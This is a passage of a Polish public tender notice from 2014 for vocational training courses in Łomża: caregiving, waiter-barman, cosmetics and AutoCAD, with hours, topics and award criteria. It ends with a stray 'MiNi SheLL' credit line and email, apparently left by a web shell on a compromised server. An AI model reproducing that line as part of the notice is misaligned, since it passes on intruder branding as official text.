ORGANIZACJA SZKOLENIA: szkolenie winno odbywać się w terminie od 21 VII  do  5 IX 2014 (Z pominięciem dni od 15 do 30 sierpnia), w dni robocze od 9:00 do16:00 (codziennie)

WYMAGANIA DODATKOWE: 
Program szkolenia powinien obejmować 120 godzin dydaktycznych  zajęć teoretycznych i praktycznych.  (w tym co najmniej 80 godzin praktycznych - 40 godzin w przedszkolu/ żłobku i 40 godzin w instytucji opiekującej się osobami starszymi )W godzinach tych należy ująć ocenę końcową uczestnika szkolenia (np. w formie egzaminu, testu, itp.).
Szkolenie powinno obejmować zagadnienia z zakresu:
a) roli i zadań opiekuna, etyki opiekuna, form opieki i pomocy ludziom starszym, chorym, niesamodzielnym
b) organizowania i planowania pracy zgodnie z przepisami i zasadami bezpieczeństwa i higieny pracy
c) pielęgnowania podstawowego i opieki nad ludźmi przewlekle chorymi i niepełnosprawnymi
d) przepisów prawa dotyczących działań pomocowych i realizacji opieki nad podopiecznymi
e) zasad udzielania pierwszej pomocy w przypadkach zagrożenia zdrowia i życia podopiecznego
f) pomagania podopiecznemu w codziennych czynnościach domowych
g) aktywizowania podopiecznego do zwiększania jego samodzielności życiowej
h) mobilizowania podopiecznego do aktywnego spędzania czasu wolnego i rozwijania jego zainteresowań
i) pomocy przy usprawnianiu ruchowym chorego i niepełnosprawnego (elementy rehabilitacji i gimnastyki)
j) podejmowania współpracy ze środowiskiem podopiecznego, zespołami opiekuńczymi i terapeutycznymi
k) doradzanie w zakresie planowania i organizacji gospodarstwa domowego, 
l) kontaktowanie się z różnego rodzaju instytucjami w celu rozwiązywania problemów zdrowotnych, materialnych, mieszkaniowych, rodzinnych i prawnych podopiecznego, 
m) inicjowanie pozytywnych relacji międzyludzkich w najbliższym otoczeniu podopiecznego, a zwłaszcza z członkami jego rodziny
n) stosowanie podstawowych zasad i metod wychowania
o)stosowanie wybranych zabaw i gier wpływających na rozwój dziecka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs Kelner - barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LICZBA UCZESTNIKÓW: 9
TERMIN  REALIZACJI USŁUGI : 21 VII- 14 VIII 2014
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża, 
CEL SZKOLENIA: celem szkolenia jest nabycie wiedzy teoretycznej i praktycznych umiejętności oraz przygotowanie do pracy na stanowisku barman - barista i kelner
ORGANIZACJA SZKOLENIA: kurs należy przeprowadzić w okresie wakacyjnym (tj. 21 lipiec - 15 sierpień 2014), w dni robocze (poniedziałek-piątek  w godzinach od 8.00 do 16.00). 

WYMAGANIA DODATKOWE: 
W czas trwania  szkolenia 120  godzin dydaktycznych przypadających na każdego uczestnika szkolenia, w tym nie mniej niż 100 godzin zajęć praktycznych 
Kurs powinien odbywać się w lokalu gastronomicznym w którym podaje się posiłki i napoje

Szkolenie powinno zawierać co najmniej zagadnienia:
z zakresu zawodu barmana:
a) wprowadzenie do zawodu barmana - wizerunek, obowiązki, etyka, organizacja pracy, bhp,
b) sprzęt barowy - rodzaje, nazwy, funkcjonowanie,
c) alkoholoznawstwo - kategorie/podział alkoholi, produkcja, zastosowanie,
d) zasady i technika komponowania napojów mieszanych - charakterystyka, podział, składniki,
e) zasady podawania napojów alkoholowych - serwowanie alkoholi, obsługa przy barze i stoliku,
f) wprowadzenie do zawodu barista
g) obowiązki, narzędzia, organizacja pracy, bhp,
h) podstawowe informacje o kawie - historia, gatunki, uprawa, pozyskiwanie, obróbka ziaren, magazynowanie, sposoby palenia,
i) espresso - sprzęt, etapy przygotowania, prawidłowe metody dozowania i ubijania,
j) napoje na bazie espresso,
k) zdobienie - wzory lane, rysowane.
z zakresu zawodu kelnera:
a) przestrzeganie zasad bhp, ppoż. w sali konsumenckiej
b) wykazywanie kultury osobistej i przestrzeganie etyki zawodowej
c) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej
d) przygotowanie poprzedzające obsługę
e) przygotowanie sali konsumenckiej
f) obsługiwanie w sali konsumenckiej
g) noszenie zastawy
h) serwowanie potraw
i) wydawanie śniadań
j) przygotowanie potraw w obecności konsumenta
k) serwowanie napojów bezalkoholowych zimnych i gorących
l) serwowanie napojów alkoholowych
m) organizacja przyjęć okolicznościowych
n) obsługa gości hotelowych przez kelnera
o) wystawianie rachunków

Wykonawca zapewni  niezbędne materiały, produkty, sprzęt i lokal do zrealizowania programu kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs kosmetyczny z elementami wizażu i stylizacji paznokci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LICZBA UCZESTNIKÓW: 5
 Wykonawca jest zobowiązany zapewnić 5 samodzielnych stanowisk pracy w salonie kosmetycznym lub pracowni kosmetycznej 
TERMIN  REALIZACJI USŁUGI : 29 lipiec-14 sierpień
MIEJSCE REALIZACJI USŁUGI:  miasto Łomża 
CEL SZKOLENIA:  zdobycie wiedzy i umiejętności z zakresu kosmetyki, wizażu i stylizacji paznokci.
ORGANIZACJA SZKOLENIA: szkolenie powinno odbywać się w dni robocze, w godz. od 8:00 do 16:00 

WYMAGANIA DODATKOWE: 
Wymagana ilość godzin zajęć dydaktycznych - 120 godzin, w tym przynajmniej 100 godzin zajęć praktycznych przypadających na 1 uczestnika kursu
Kurs dla będzie odbywał się w godz. od 8:00 do 16:00 
Szkolenie powinno obejmować zagadnienia z zakresu:
a) zorganizowanie stanowiska pracy, przygotowanie kosmetyków, narzędzi pracy
b) umiejętność przeprowadzenia wywiadu z klientem,
c) techniki wizażu i profesjonalnego makijażu
d) wykonywanie różnych rodzajów makijażu
e) techniki stylizacji - określenie typu urody i sylwetki, ubioru, korekcja stylu, zastosowanie dodatków, biżuterii
f) diagnostyka cery
g) pielęgnacja twarzy - zabiegi do wszystkich rodzajów cery (nawilżające, regenerujące, kolagenowe, dotleniające, stymulujące, liftingujące, z zastosowaniem aparatu do kawitacji, mikrodermabrazji), kwasy owocowe 
h) oczyszczanie manualne, wykonywanie masażu twarzy
i) Henna rzęs i brwi, regulacja brwi
j) Pielęgnacja dłoni- preparaty używane do pielęgnacji dłoni i paznokci, zdobnictwo paznokci w tym: akrylem, żelem oraz przedłużanie paznokci, manicure francuski, manicure hybrydowy
k) pielęgnacja stóp - pedicure kosmetyczny, specjalistyczny, detoksykacja stóp,
l) Pielęgnacja ciała - zabiegi antycellulitowe, zabiegi detoksykujące, peelingi
m) Depilacja skóry przy użyciu wosku depilacja - wszystkie rodzaje wosków; obsługa aparatów i urządzeń stosowanych w kosmetyce z uwzględnieniem obowiązujących przepisów sanitarnych i BHP;
n) zapewnienie materiałów i narzędzi kosmetycznych potrzebnych do przeprowadzenia zajęć praktycznych

Zapewnienie odpowiedniego miejsca prowadzenia zajęć teoretycznych i praktycznych wyposażonego w sprzęt i pomoce dydaktyczne umożliwiające prawidłową realizacji kształcenia, zapewniające bezpieczne i higieniczne warunki pracy i nauki. Zajęcia praktyczne muszą odbywać się w salonie kosmetycznym lub pracowni kosmetycznej ( zajęcia praktyczne muszą być zorganizowane w taki sposób, by każdy uczestnik miał samodzielne stanowisko pracy).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Programowanie AUTOCAD I, AUTOCAD II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ILOŚĆ UCZESTNIKÓW: 2
TERMIN  REALIZACJI USŁUGI :   od 1 sierpień 2014 do 14 sierpnia 2014
MIEJSCE REALIZACJI USŁUGI: miasto Łomża, 
CEL SZKOLENIA:  nabycie praktycznej umiejętności obsługi  programu AutoCAD na poziomie podstawowym (AUTOCAD 1) oraz  nauka wykorzystania zaawansowanych technik projektowania wspomaganego komputerowo (AUTOCAD 2).
ORGANIZACJA SZKOLENIA: Wymagana ilość godzin zajęć dydaktycznych - 70 godzin, przypadających na 1 uczestnika kursu w tym 35 godzin dydaktycznych na każdy moduł szkolenia. Szkolenie powinno odbywać się w dni robocze, w godz. od 9:00 do 15:00. Wykonawca może dołączyć uczestnika szkolenia do grupy szkoleniowej, po wcześniejszym uzgodnieniu z Wykonawcą 

WYMAGANIA DODATKOWE:
Wymagane jest przynajmniej 35 godzin dydaktycznych na każdy moduł szkolenia
Zakres szkolenia (AUTOCAD 1): 
wprowadzenie do pracy z programem, wyświetlanie rysunku, ustawienia rysunku, współrzędne i podstawowe narzędzia rysunkowe, tworzenie  i modyfikowanie geometrii dwuwymiarowej, zarządzanie cechami obiektów, techniki konstrukcyjne, obiekty tekstowe i ich style, wprowadzenie do wymiarowania, kreskowanie, wprowadzenie do wydruku
Zakres szkolenia (AUTOCAD 2): 
efektywna praca z zestawami wyborów, zaawansowane typy obiektów, bloki i ich atrybuty, rysunki odnośników zewnętrznych, obrazy rastrowe, praca na arkuszach , obiekty aplikacji zewnętrznych, wymiarowanie w przestrzeni modelu i papieru, elementy dostosowawcze programu

W trakcie zajęć - wykonawca zapewnia 1 stanowisko komputerowe dla każdego uczestnika szkolenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com